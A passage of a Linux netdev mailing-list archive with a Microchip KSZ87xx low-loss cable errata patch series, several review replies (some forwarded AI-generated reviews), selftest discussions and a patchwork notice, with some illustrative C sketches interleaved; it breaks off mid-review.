* [PATCH v3 1/3] net: dsa: microchip: implement KSZ87xx Module 3 low-loss cable errata
From: Fidelio Lawson @ 2026-04-14 9:12 UTC
To: Woojung Huh, UNGLinuxDriver, Andrew Lunn, Vladimir Oltean,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Marek Vasut, Maxime Chevallier, Simon Horman, Heiner Kallweit,
Russell King
Cc: Woojung Huh, netdev, linux-kernel, Fidelio Lawson
In-Reply-To: <20260414-ksz87xx_errata_low_loss_connections-v3-0-0e3838ca98c9@exotec.com>
Implement the "Module 3: Equalizer fix for short cables" erratum from
Microchip document DS80000687C for KSZ87xx switches.
The issue affects short or low-loss cable links (e.g. CAT5e/CAT6),
where the PHY receiver equalizer may amplify high-amplitude signals
excessively, resulting in internal distortion and link establishment
failures.
KSZ87xx devices require a workaround for the Module 3 low-loss cable
condition, controlled through the switch TABLE_LINK_MD_V indirect
registers.
The affected registers are part of the switch address space and are not
directly accessible from the PHY driver. To keep the PHY-facing API
clean and avoid leaking switch-specific details, model this errata
control as vendor-specific Clause 22 PHY registers.
A vendor-specific Clause 22 PHY register, PHY_REG_KSZ87XX_LOW_LOSS, is
introduced as a mode selector, and ksz8_r_phy() / ksz8_w_phy()
translate accesses to its mode bits into the appropriate indirect
TABLE_LINK_MD_V accesses.
The control register defines the following modes:
0: disabled (default behavior)
1: EQ training workaround
2: LPF 90 MHz
3: LPF 62 MHz
4: LPF 55 MHz
5: LPF 44 MHz
Workaround 1: Adjusts the DSP EQ training behavior via LinkMD register
0x3C. Widens and optimizes the DSP EQ compensation range,
and is expected to solve most short/low-loss cable issues.
Workaround 2: For cases where Workaround 1 is not sufficient.
This one adjusts the receiver low-pass filter bandwidth, effectively
reducing the high-frequency component of the received signal.
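For illustration only (not part of the patch): a minimal user-space sketch
of how the mode selector could map onto indirect LinkMD writes. The register
offsets and values are the ones this patch adds to ksz8_reg.h; struct
linkmd_write and low_loss_mode_to_writes() are hypothetical names, and the
sketch assumes that mode 0 restores both registers to their defaults
(EQ training 0x0A, LPF 90 MHz).

```c
#include <stdint.h>

/* Values taken from the ksz8_reg.h hunk of this patch. */
#define KSZ87XX_REG_EQ_TRAIN		0x3C
#define KSZ87XX_REG_PHY_LPF		0x4C
#define KSZ87XX_EQ_TRAIN_DEFAULT	0x0A
#define KSZ87XX_EQ_TRAIN_LOW_LOSS	0x15

/* Hypothetical helper type: one indirect LinkMD register write. */
struct linkmd_write {
	uint8_t reg;
	uint8_t val;
};

/*
 * Hypothetical helper: translate a mode (0-5) into the LinkMD writes it
 * implies. Returns the number of writes stored in out[], or -1 for an
 * unknown mode.
 */
static int low_loss_mode_to_writes(unsigned int mode,
				   struct linkmd_write out[2])
{
	/* LPF bandwidth lives in bits [7:6]: 90, 62, 55, 44 MHz. */
	static const uint8_t lpf[] = { 0x00, 0x40, 0x80, 0xC0 };

	switch (mode) {
	case 0:	/* disabled: assumed to restore both defaults */
		out[0] = (struct linkmd_write){ KSZ87XX_REG_EQ_TRAIN,
						KSZ87XX_EQ_TRAIN_DEFAULT };
		out[1] = (struct linkmd_write){ KSZ87XX_REG_PHY_LPF, lpf[0] };
		return 2;
	case 1:	/* Workaround 1: EQ training */
		out[0] = (struct linkmd_write){ KSZ87XX_REG_EQ_TRAIN,
						KSZ87XX_EQ_TRAIN_LOW_LOSS };
		return 1;
	case 2:
	case 3:
	case 4:
	case 5:	/* Workaround 2: LPF bandwidth */
		out[0] = (struct linkmd_write){ KSZ87XX_REG_PHY_LPF,
						lpf[mode - 2] };
		return 1;
	default:
		return -1;
	}
}
```

In the driver, each returned pair would correspond to one
ksz8_ind_write8(dev, TABLE_LINK_MD, reg, val) call.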
The register is accessible through standard PHY read/write operations
(e.g. phytool), without requiring any switch-specific userspace
interface. This allows robust link establishment on short or
low-loss cabling without requiring DTS properties and without
constraining hardware design choices.
The erratum affects the shared PHY analog front-end and therefore
applies globally to the switch.
Signed-off-by: Fidelio Lawson <fidelio.lawson@exotec.com>
---
drivers/net/dsa/microchip/ksz8.c | 45 ++++++++++++++++++++++++++++++++++
drivers/net/dsa/microchip/ksz8_reg.h | 36 ++++++++++++++++++++++++++-
drivers/net/dsa/microchip/ksz_common.h | 3 +++
3 files changed, 83 insertions(+), 1 deletion(-)
diff --git a/drivers/net/dsa/microchip/ksz8.c b/drivers/net/dsa/microchip/ksz8.c
index c354abdafc1b..596c85654f24 100644
--- a/drivers/net/dsa/microchip/ksz8.c
+++ b/drivers/net/dsa/microchip/ksz8.c
@@ -1058,6 +1058,11 @@ int ksz8_r_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 *val)
if (ret)
return ret;
+ break;
+ case PHY_REG_KSZ87XX_LOW_LOSS:
+ if (!ksz_is_ksz87xx(dev))
+ return -EOPNOTSUPP;
+ data = dev->low_loss_wa_mode;
break;
default:
processed = false;
@@ -1271,6 +1276,46 @@ int ksz8_w_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 val)
if (ret)
return ret;
break;
+ case PHY_REG_KSZ87XX_LOW_LOSS:
+ if (!ksz_is_ksz87xx(dev))
+ return -EOPNOTSUPP;
+
+ switch (val & PHY_KSZ87XX_LOW_LOSS_MASK) {
+ case PHY_LOW_LOSS_ERRATA_DISABLED:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_EQ_TRAIN,
+ KSZ87XX_EQ_TRAIN_DEFAULT);
+ if (!ret)
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD,
+ KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_90MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_EQ_TRAIN:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_EQ_TRAIN,
+ KSZ87XX_EQ_TRAIN_LOW_LOSS);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_90MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_90MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_62MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_62MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_55MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_55MHZ);
+ break;
+ case KSZ87XX_LOW_LOSS_LPF_44MHZ:
+ ret = ksz8_ind_write8(dev, TABLE_LINK_MD, KSZ87XX_REG_PHY_LPF,
+ KSZ87XX_PHY_LPF_44MHZ);
+ break;
+ default:
+ return -EINVAL;
+ }
+
+ if (!ret)
+ dev->low_loss_wa_mode = val & PHY_KSZ87XX_LOW_LOSS_MASK;
+ return ret;
default:
break;
}
diff --git a/drivers/net/dsa/microchip/ksz8_reg.h b/drivers/net/dsa/microchip/ksz8_reg.h
index 332408567b47..4e02e044339c 100644
--- a/drivers/net/dsa/microchip/ksz8_reg.h
+++ b/drivers/net/dsa/microchip/ksz8_reg.h
@@ -202,6 +202,10 @@
#define REG_PORT_3_STATUS_0 0x38
#define REG_PORT_4_STATUS_0 0x48
+/* KSZ87xx LinkMD registers (TABLE_LINK_MD_V) */
+#define KSZ87XX_REG_EQ_TRAIN 0x3C
+#define KSZ87XX_REG_PHY_LPF 0x4C
+
/* For KSZ8765. */
#define PORT_REMOTE_ASYM_PAUSE BIT(5)
#define PORT_REMOTE_SYM_PAUSE BIT(4)
@@ -342,7 +346,7 @@
#define TABLE_EEE (TABLE_EEE_V << TABLE_EXT_SELECT_S)
#define TABLE_ACL (TABLE_ACL_V << TABLE_EXT_SELECT_S)
#define TABLE_PME (TABLE_PME_V << TABLE_EXT_SELECT_S)
-#define TABLE_LINK_MD (TABLE_LINK_MD << TABLE_EXT_SELECT_S)
+#define TABLE_LINK_MD (TABLE_LINK_MD_V << TABLE_EXT_SELECT_S)
#define TABLE_READ BIT(4)
#define TABLE_SELECT_S 2
#define TABLE_STATIC_MAC_V 0
@@ -729,6 +733,36 @@
#define PHY_POWER_SAVING_ENABLE BIT(2)
#define PHY_REMOTE_LOOPBACK BIT(1)
+/* Equalizer low-loss workaround */
+#define PHY_REG_KSZ87XX_LOW_LOSS 0x1C
+#define PHY_KSZ87XX_LOW_LOSS_MASK GENMASK(2, 0)
+
+/* KSZ87xx low-loss EQ mode selector (vendor-specific PHY reg 0x1c)
+ *
+ * Values:
+ * 0: disabled (default behavior)
+ * 1: EQ training workaround
+ * 2: LPF 90 MHz
+ * 3: LPF 62 MHz
+ * 4: LPF 55 MHz
+ * 5: LPF 44 MHz
+ */
+#define PHY_LOW_LOSS_ERRATA_DISABLED 0
+#define KSZ87XX_LOW_LOSS_EQ_TRAIN 1
+#define KSZ87XX_LOW_LOSS_LPF_90MHZ 2
+#define KSZ87XX_LOW_LOSS_LPF_62MHZ 3
+#define KSZ87XX_LOW_LOSS_LPF_55MHZ 4
+#define KSZ87XX_LOW_LOSS_LPF_44MHZ 5
+
+#define KSZ87XX_EQ_TRAIN_DEFAULT 0x0A
+#define KSZ87XX_EQ_TRAIN_LOW_LOSS 0x15
+
+/* LPF bandwidth bits [7:6]: 00 = 90MHz, 01 = 62MHz, 10 = 55MHz, 11 = 44MHz */
+#define KSZ87XX_PHY_LPF_90MHZ 0x00
+#define KSZ87XX_PHY_LPF_62MHZ 0x40
+#define KSZ87XX_PHY_LPF_55MHZ 0x80
+#define KSZ87XX_PHY_LPF_44MHZ 0xC0
+
/* KSZ8463 specific registers. */
#define P1MBCR 0x4C
#define P1MBSR 0x4E
diff --git a/drivers/net/dsa/microchip/ksz_common.h b/drivers/net/dsa/microchip/ksz_common.h
index 929aff4c55de..16a6074ea4b4 100644
--- a/drivers/net/dsa/microchip/ksz_common.h
+++ b/drivers/net/dsa/microchip/ksz_common.h
@@ -219,6 +219,9 @@ struct ksz_device {
* the switch’s internal PHYs, bypassing the main SPI interface.
*/
struct mii_bus *parent_mdio_bus;
+
+ /* Equalizer low-loss workaround tunable */
+ u8 low_loss_wa_mode; /* KSZ87xx low-loss EQ/LPF mode selector (0-5) */
};
/* List of supported models */
--
2.53.0
* [PATCH v3 0/3] ksz87xx: add support for low-loss cable equalizer errata
From: Fidelio Lawson @ 2026-04-14 9:12 UTC
To: Woojung Huh, UNGLinuxDriver, Andrew Lunn, Vladimir Oltean,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Marek Vasut, Maxime Chevallier, Simon Horman, Heiner Kallweit,
Russell King
Cc: Woojung Huh, netdev, linux-kernel, Fidelio Lawson
Hello,
This patch implements the “Module 3: Equalizer fix for short cables” erratum
described in Microchip document DS80000687C for KSZ87xx switches.
According to the erratum, the embedded PHY receiver in KSZ87xx switches is
tuned by default for long, high-loss Ethernet cables. When operating with
short or low-loss cables (for example CAT5e or CAT6), the PHY equalizer may
over-amplify the incoming signal, leading to internal distortion and link
establishment failures.
Microchip provides two workarounds, each requiring a write to a different
indirect PHY register.
Both workarounds require programming internal PHY/DSP registers located in the
LinkMD table, accessed through the KSZ8 indirect register mechanism. Since these
registers belong to the switch address space and are not directly accessible
from a standalone PHY driver, the erratum control is modeled as a vendor-specific
Clause 22 PHY register, virtualized by the KSZ8 DSA driver.
Reads and writes to this register are intercepted by ksz8_r_phy() /
ksz8_w_phy() and translated into the required TABLE_LINK_MD_V indirect accesses.
The erratum affects the shared PHY analog front-end and therefore applies
globally to the switch.
The control register defines the following modes:
0: disabled (default behavior)
1: EQ training workaround
2: LPF 90 MHz
3: LPF 62 MHz
4: LPF 55 MHz
5: LPF 44 MHz
The register can be read and written from userspace via a phy tunable.
Note that current ethtool userspace only supports a fixed set of PHY tunables;
vendor-specific tunables may require either phytool or a newer userspace extension.
This series is based on Linux v7.0-rc1.
Signed-off-by: Fidelio Lawson <fidelio.lawson@exotec.com>
---
Changes in v3:
- Exposed all LPF bandwidth values supported by the hardware.
- Added phy tunable.
- Link to v2: https://patch.msgid.link/20260408-ksz87xx_errata_low_loss_connections-v2-1-9cfe38691713@exotec.com
Changes in v2:
- Dropped the device tree approach based on review feedback
- Modeled the errata control as a vendor-specific Clause 22 PHY register
- Added KSZ87xx-specific guards and replaced magic values with named macros
- Rebased on Linux v7.0-rc1
- Link to v1: https://patch.msgid.link/20260326-ksz87xx_errata_low_loss_connections-v1-0-79a698f43626@exotec.com
---
Fidelio Lawson (3):
net: dsa: microchip: implement KSZ87xx Module 3 low-loss cable errata
net: ethtool: add KSZ87xx low-loss PHY tunable
net: phy: micrel: expose KSZ87xx low-loss erratum via PHY tunable
drivers/net/dsa/microchip/ksz8.c | 45 ++++++++++++++++++++++++++++++++++
drivers/net/dsa/microchip/ksz8_reg.h | 36 ++++++++++++++++++++++++++-
drivers/net/dsa/microchip/ksz_common.h | 3 +++
drivers/net/phy/micrel.c | 39 +++++++++++++++++++++++++++++
include/uapi/linux/ethtool.h | 1 +
net/ethtool/common.c | 1 +
net/ethtool/ioctl.c | 1 +
7 files changed, 125 insertions(+), 1 deletion(-)
---
base-commit: 2d1373e4246da3b58e1df058374ed6b101804e07
change-id: 20260323-ksz87xx_errata_low_loss_connections-b65e76e2b403
Best regards,
--
Fidelio Lawson <fidelio.lawson@exotec.com>
* Re: [PATCH net-next v11 05/10] bng_en: add support for link async events
From: Bhargava Chenna Marreddy @ 2026-04-14 9:11 UTC
To: Vadim Fedorenko
Cc: davem, edumazet, kuba, pabeni, andrew+netdev, horms, netdev,
linux-kernel, michael.chan, pavan.chebbi, vsrama-krishna.nemani,
vikas.gupta, Rajashekar Hudumula, Ajit Kumar Khaparde
In-Reply-To: <3596a43d-8c8e-47ac-ae73-ee282f3be945@linux.dev>
On Wed, Apr 8, 2026 at 6:22 PM Vadim Fedorenko
<vadim.fedorenko@linux.dev> wrote:
> > @@ -190,6 +199,14 @@ int bnge_hwrm_func_drv_rgtr(struct bnge_dev *bd)
> > req->ver_min = cpu_to_le16(DRV_VER_MIN);
> > req->ver_upd = cpu_to_le16(DRV_VER_UPD);
> >
> > + memset(async_events_bmap, 0, sizeof(async_events_bmap));
>
> bitmap API has bitmap_zero()
Thanks, Vadim.
Since the subsequent version is already merged, I've noted this for a
future update.
Thanks,
Bhargava Marreddy.
* Re: [PATCH net-next v2 2/2] selftests/bpf: verify syncookie statistics in tcp_custom_syncookie
From: Paolo Abeni @ 2026-04-14 9:08 UTC
To: Kuniyuki Iwashima, Jiayuan Chen
Cc: netdev, Eric Dumazet, Neal Cardwell, David S. Miller,
Jakub Kicinski, Simon Horman, David Ahern, Alexei Starovoitov,
Daniel Borkmann, Andrii Nakryiko, Martin KaFai Lau,
Eduard Zingerman, Song Liu, Yonghong Song, John Fastabend,
KP Singh, Stanislav Fomichev, Hao Luo, Jiri Olsa, Shuah Khan,
linux-kernel, bpf, linux-kselftest
In-Reply-To: <CAAVpQUCCZVogDUUTfr3k-JxV52kpVvdYzqFC68-J3n6_ugd4Uw@mail.gmail.com>
On 4/14/26 7:50 AM, Kuniyuki Iwashima wrote:
> On Fri, Apr 10, 2026 at 6:32 PM Jiayuan Chen <jiayuan.chen@linux.dev> wrote:
>>
>> Add read_tcpext_snmp() helper to network_helpers which reads a
>> TcpExt SNMP counter via nstat, and use it in the tcp_custom_syncookie
>> test to verify that LINUX_MIB_SYNCOOKIESRECV is incremented and
>> LINUX_MIB_SYNCOOKIESFAILED stays unchanged across a successful
>> BPF custom syncookie validation.
>>
>> The delta is captured between start_server() and accept(), which
>> covers the full SYN/ACK/cookie-check path for one connection.
>>
>> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
>> ---
>> tools/testing/selftests/bpf/network_helpers.c | 22 +++++++++++++++++++
>> tools/testing/selftests/bpf/network_helpers.h | 1 +
>> .../bpf/prog_tests/tcp_custom_syncookie.c | 20 +++++++++++++++++
>
> As you touch bpf selftest helper files, please rebase on bpf-next
> to avoid possible conflicts and tag bpf-next in the Subject.
To hopefully minimize conflict handling, I'm going to apply patch
1/2 to net-next. Please resubmit patch 2/2 to bpf-next after the
relevant net changes land there.
/P
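For readers unfamiliar with where these counters come from: the quoted
helper reads them via nstat, but the same TcpExt values are exported in
/proc/net/netstat as a header line followed by a value line. The sketch
below is an assumption-laden alternative, not the selftest's code;
tcpext_lookup() is a hypothetical name and it works on the two lines
already read into memory.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Hypothetical helper: given the "TcpExt:" header line and the matching
 * "TcpExt:" value line from /proc/net/netstat, find the counter called
 * name. Returns 0 and stores the value in *out, or -1 if not found.
 */
static int tcpext_lookup(const char *hdr, const char *vals,
			 const char *name, unsigned long long *out)
{
	char h[4096], v[4096];
	char *hs, *vs, *ht, *vt;

	/* strtok_r() modifies its input, so work on local copies. */
	snprintf(h, sizeof(h), "%s", hdr);
	snprintf(v, sizeof(v), "%s", vals);

	ht = strtok_r(h, " \n", &hs);
	vt = strtok_r(v, " \n", &vs);
	while (ht && vt) {
		/* Header and value tokens are walked in lockstep. */
		if (!strcmp(ht, name)) {
			*out = strtoull(vt, NULL, 10);
			return 0;
		}
		ht = strtok_r(NULL, " \n", &hs);
		vt = strtok_r(NULL, " \n", &vs);
	}
	return -1;
}
```

Sampling SyncookiesRecv and SyncookiesFailed this way before and after the
connection would give the same kind of delta the test checks.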
* Re: [PATCH iwl-next 2/10] ice: allow setting advertised speed and duplex for all media types
From: Simon Horman @ 2026-04-14 9:04 UTC
To: aleksandr.loktionov
Cc: 'Simon Horman', intel-wired-lan, anthony.l.nguyen, netdev,
jacob.e.keller
In-Reply-To: <20260410074921.1254213-3-aleksandr.loktionov@intel.com>
From: 'Simon Horman' <horms@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
---
ice: allow setting advertised speed and duplex for all media types
This commit allows setting advertised speed and duplex for all media types by
only refusing media types NONE or UNKNOWN in strict mode. It adds AUI and NONE
to the ice_media_type enum.
> diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
> index e6a20af6f63de..62d214c5582ad 100644
> --- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
> +++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
> @@ -2634,10 +2635,14 @@ ice_set_link_ksettings(struct net_device *netdev,
> if (!pi)
> return -EIO;
>
> - if (pi->phy.media_type != ICE_MEDIA_BASET &&
> - pi->phy.media_type != ICE_MEDIA_FIBER &&
> - pi->phy.media_type != ICE_MEDIA_BACKPLANE &&
> - pi->phy.media_type != ICE_MEDIA_DA &&
> + lenient_mode = test_bit(ICE_FLAG_LINK_LENIENT_MODE_ENA, pf->flags);
> +
> + /* Setting the speed and duplex advertised by autonegotiation is
> + * supported for all media types, so only return unsupported for media
> + * type none or unknown in strict mode.
> + */
> + if ((pi->phy.media_type == ICE_MEDIA_NONE ||
> + (pi->phy.media_type == ICE_MEDIA_UNKNOWN && !lenient_mode)) &&
> pi->phy.link_info.link_info & ICE_AQ_LINK_UP)
> return -EOPNOTSUPP;
Will AUI media types still be rejected here in strict mode?
The patch adds ICE_MEDIA_AUI and ICE_MEDIA_NONE to enum ice_media_type, but
doesn't appear to update ice_get_media_type() to actually return these new
values.
If AUI media continues to fall through to ICE_MEDIA_UNKNOWN, wouldn't the new
logic still reject it when lenient mode is disabled, defeating the intent of
the patch?
[ ... ]
> @@ -2667,7 +2672,7 @@ ice_set_link_ksettings(struct net_device *netdev,
> if (!bitmap_subset(copy_ks.link_modes.advertising,
> safe_ks.link_modes.supported,
> __ETHTOOL_LINK_MODE_MASK_NBITS)) {
> - if (!test_bit(ICE_FLAG_LINK_LENIENT_MODE_ENA, pf->flags))
> + if (!lenient_mode)
> netdev_info(netdev, "The selected speed is not supported by the current media. Please select a link speed that is supported by the current media.\n");
> err = -EOPNOTSUPP;
> goto done;
This isn't a bug introduced by this patch, but does taking this error path
accidentally release another thread's lock?
The ICE_CFG_BUSY flag is used as an ad-hoc lock later in this function:
while (test_and_set_bit(ICE_CFG_BUSY, pf->state)) {
timeout--;
if (!timeout) {
err = -EBUSY;
goto done;
}
usleep_range(TEST_SET_BITS_SLEEP_MIN, TEST_SET_BITS_SLEEP_MAX);
}
If the bitmap_subset() check fails, or if the while loop times out, it jumps to
the done label:
done:
kfree(phy_caps);
clear_bit(ICE_CFG_BUSY, pf->state);
Since the bitmap_subset() check happens before test_and_set_bit() has acquired
the lock, wouldn't this unconditionally clear the ICE_CFG_BUSY flag even if
another thread currently holds it? Could this synchronization be replaced with a
standard lock to avoid these issues?
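One way to address the second concern, sketched in user-space C11 rather
than kernel code: track whether this caller actually acquired the busy flag
and only clear it in that case. cfg_busy, set_link_settings() and the
return codes are hypothetical stand-ins for ICE_CFG_BUSY and
ice_set_link_ksettings(); this is not the driver's implementation.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical stand-in for the ICE_CFG_BUSY bit in pf->state. */
static atomic_bool cfg_busy;

/*
 * Returns 0 on success, -1 if validation fails before the flag is taken,
 * -2 if the flag could not be acquired within max_tries attempts.
 */
static int set_link_settings(bool settings_valid, int max_tries)
{
	bool locked = false;
	int err = 0;

	/* Early validation: the flag has not been taken yet. */
	if (!settings_valid) {
		err = -1;
		goto done;
	}

	/* Ad-hoc lock: atomic_exchange() returns the previous value. */
	while (atomic_exchange(&cfg_busy, true)) {
		if (--max_tries <= 0) {
			err = -2;
			goto done;
		}
	}
	locked = true;

	/* ... apply the configuration while holding the flag ... */

done:
	/* Only release what this caller actually acquired. */
	if (locked)
		atomic_store(&cfg_busy, false);
	return err;
}
```

A mutex would make the ownership explicit and avoid the open-coded retry
loop, which is what the last question in the review hints at.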
* Re: [PATCH net-next 5/5] selftests: ovpn: align command flow with TAP
From: Antonio Quartulli @ 2026-04-14 9:02 UTC
To: Jakub Kicinski; +Cc: netdev, ralf, sd, pabeni, andrew+netdev, davem, edumazet
In-Reply-To: <20260413235608.3699773-2-kuba@kernel.org>
Hi,
On 14/04/2026 01:56, Jakub Kicinski wrote:
> This is an AI-generated review of your patch. The human sending this
> email says: "The second one looks legit, would you prefer to follow
> up or respin?"
Will respin, since we also have to fix the timeout in 2/5.
Thanks,
--
Antonio Quartulli
OpenVPN Inc.
* Re: [PATCH net-next 2/5] selftests: ovpn: fail notification check on mismatch
From: Antonio Quartulli @ 2026-04-14 9:01 UTC
To: Jakub Kicinski
Cc: netdev, ralf, Sabrina Dubroca, Paolo Abeni, Andrew Lunn,
David S. Miller, Eric Dumazet
In-Reply-To: <20260413170014.12316e9b@kernel.org>
Hi,
On 14/04/2026 02:00, Jakub Kicinski wrote:
> On Mon, 13 Apr 2026 00:11:18 +0200 Antonio Quartulli wrote:
>> compare_ntfs doesn't fail when expected and received notification
>> streams diverge.
>>
>> Fix this bug by tracking the diff exit status explicitly and returning it
>> to the caller so notification mismatches propagate as test failures.
>
> Hm, this series nicely cleans up test_mark.sh failures
> but test_tcp.sh now always fails on debug (slow) kernel
> builds with:
>
> # TAP version 13
> # 1..12
> # ok 1 setup network topology
> # ok 2 run baseline data traffic
> # ok 3 run LAN traffic behind peer1
> # ok 4 run iperf throughput
> # ok 5 run key rollout
> # ok 6 query peers
> # ok 7 query missing peer fails
> # ok 8 peer lifecycle and key queries
> # ok 9 delete peer while traffic
> # ok 10 delete stale keys
> # ok 11 check timeout behavior
> # Checking notifications for peer 3... failed
> # 1,9d0
> # < {
> # < "name": "peer-del-ntf",
> # < "msg": {
> # < "peer": {
> # < "del-reason": "expired",
> # < "id": 12
> # < }
> # < }
> # < }
> # validate listener output for peer 3: command failed with rc=1: ovpn_compare_ntfs 3
> # not ok 12 validate notification output
> # # Totals: pass:11 fail:1 xfail:0 xpass:0 skip:0 error:0
>
> Similar failure in test_symmetric_id_tcp.sh
>
> Only the debug kernels tho, non-debug kernels seem to pass.
> So probably some race / slowness.
We have to extend the internal timeout a bit, because it triggers before
the notification is delivered.
Will get this fixed.
Thanks,
--
Antonio Quartulli
OpenVPN Inc.
* Re: [PATCH net v7 0/2] net,bpf: fix null-ptr-deref in xdp_master_redirect() for bonding and add selftest
From: patchwork-bot+netdevbpf @ 2026-04-14 9:00 UTC
To: Jiayuan Chen
Cc: netdev, jiayuan.chen, ast, daniel, andrii, martin.lau, eddyz87,
song, yonghong.song, john.fastabend, kpsingh, sdf, haoluo, jolsa,
davem, edumazet, kuba, pabeni, horms, hawk, shuah, joamaki, bpf,
linux-kernel, linux-kselftest
In-Reply-To: <20260411005524.201200-1-jiayuan.chen@linux.dev>
Hello:
This series was applied to netdev/net.git (main)
by Paolo Abeni <pabeni@redhat.com>:
On Sat, 11 Apr 2026 08:55:18 +0800 you wrote:
> From: Jiayuan Chen <jiayuan.chen@shopee.com>
>
> This series has gone through several rounds of discussion and the
> maintainers hold different views on where the fix should live (in the
> generic xdp_master_redirect() path vs. inside bonding). I respect all
> of the suggestions, but I would like to get the crash fixed first, so
> this version takes the approach of checking whether the master device
> is up in xdp_master_redirect(), as suggested by Daniel Borkmann. If a
> different shape is preferred later it can be done as a follow-up, but
> the null-ptr-deref should not linger.
>
> [...]
Here is the summary with links:
- [net,v7,1/2] net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master
https://git.kernel.org/netdev/net/c/1921f91298d1
- [net,v7,2/2] selftests/bpf: add test for xdp_master_redirect with bond not up
https://git.kernel.org/netdev/net/c/8dd1bdde38af
You are awesome, thank you!
--
Deet-doot-dot, I am a bot.
https://korg.docs.kernel.org/patchwork/pwbot.html
* Re: [PATCH v2] Bluetooth: Add Broadcom channel priority commands
From: Neal Gompa @ 2026-04-14 8:59 UTC
To: fnkl.kernel
Cc: Sven Peter, Janne Grunau, Marcel Holtmann, Luiz Augusto von Dentz,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Simon Horman, linux-kernel, asahi, linux-arm-kernel,
linux-bluetooth, netdev
In-Reply-To: <20260407-brcm-prio-v2-1-3f745edf49af@gmail.com>
On Tue, Apr 7, 2026 at 1:46 PM Sasha Finkelstein via B4 Relay
<devnull+fnkl.kernel.gmail.com@kernel.org> wrote:
>
> From: Sasha Finkelstein <fnkl.kernel@gmail.com>
>
> Certain Broadcom bluetooth chips (bcm4377/bcm4378/bcm438) need ACL
> streams carrying audio to be set as "high priority" using a vendor
> specific command to prevent 10-ish second-long dropouts whenever
> something does a device scan. This patch sends the command when the
> socket priority is set to TC_PRIO_INTERACTIVE, as BlueZ does for audio.
>
> Signed-off-by: Sasha Finkelstein <fnkl.kernel@gmail.com>
> ---
> Changes in v2:
> - new ioctl got nack-ed, so let's use sk_priority as the trigger
> - Link to v1: https://lore.kernel.org/r/20260407-brcm-prio-v1-1-f38b17376640@gmail.com
> ---
Thank you so much for this!
Reviewed-by: Neal Gompa <neal@gompa.dev>
--
真実はいつも一つ!/ Always, there's only one truth!
* Re: [net-next] net: airoha: Wait for TX to complete in airoha_dev_stop()
From: Lorenzo Bianconi @ 2026-04-14 8:57 UTC
To: Paolo Abeni
Cc: edumazet, kuba, davem, netdev, andrew+netdev, linux-arm-kernel,
linux-mediatek
In-Reply-To: <20260414082949.104611-1-pabeni@redhat.com>
> This is an AI-generated review of your patch. The human sending this
> email has considered the AI review valid, or at least plausible.
>
> For local reproduction steps see https://netdev-ai.bots.linux.dev/ai-local.html
> ---
> net: airoha: Wait for TX to complete in airoha_dev_stop()
>
> Wait for TX to complete in airoha_dev_stop routine before stopping the
> TX DMA and run airoha_qdma_cleanup_tx_queue routine. Moreover,
> start/stop TX/RX NAPIs in ndo_open()/ndo_stop() callbacks in order to be
> sure the TX NAPIs have completed before stopping the TX DMA engine in
> airoha_dev_stop routine.
>
> > diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> > index 8e4b043af4bc..9e40c8f375c1 100644
> > --- a/drivers/net/ethernet/airoha/airoha_eth.c
> > +++ b/drivers/net/ethernet/airoha/airoha_eth.c
>
> [ ... ]
>
> > @@ -1684,18 +1686,26 @@ static int airoha_dev_stop(struct net_device *dev)
> > struct airoha_qdma *qdma = port->qdma;
> > int i, err;
> >
> > - netif_tx_disable(dev);
> > err = airoha_set_vip_for_gdm_port(port, false);
> > if (err)
> > return err;
> >
> > - for (i = 0; i < ARRAY_SIZE(qdma->q_tx); i++)
> > - netdev_tx_reset_subqueue(dev, i);
> > -
> > airoha_set_gdm_port_fwd_cfg(qdma->eth, REG_GDM_FWD_CFG(port->id),
> > FE_PSE_PORT_DROP);
> >
> > + netif_tx_disable(dev);
> > if (atomic_dec_and_test(&qdma->users)) {
> > + u32 val;
> > +
> > + /* Wait for TX to complete */
> > + err = read_poll_timeout(airoha_qdma_rr, val,
> > + !(val & GLOBAL_CFG_TX_DMA_BUSY_MASK),
> > + USEC_PER_MSEC, 100 * USEC_PER_MSEC,
> > + false, qdma, REG_QDMA_GLOBAL_CFG);
> > + if (err)
> > + return err;
> > ^^^^^^^^^^
>
> Can this leave the device in an inconsistent state? When read_poll_timeout()
> fails (TX DMA busy for more than 100ms), airoha_dev_stop() returns an error
> immediately. However, atomic_dec_and_test(&qdma->users) has already
> decremented qdma->users to 0, but airoha_qdma_stop_napi() was never called,
> so all NAPIs remain enabled.
>
> The networking core (__dev_close_many in net/core/dev.c) ignores the
> ndo_stop return value and marks the device as down regardless. When the
> device is later brought up again, airoha_dev_open() sees atomic_fetch_inc()
> return 0 (old value) and calls airoha_qdma_start_napi() -> napi_enable(),
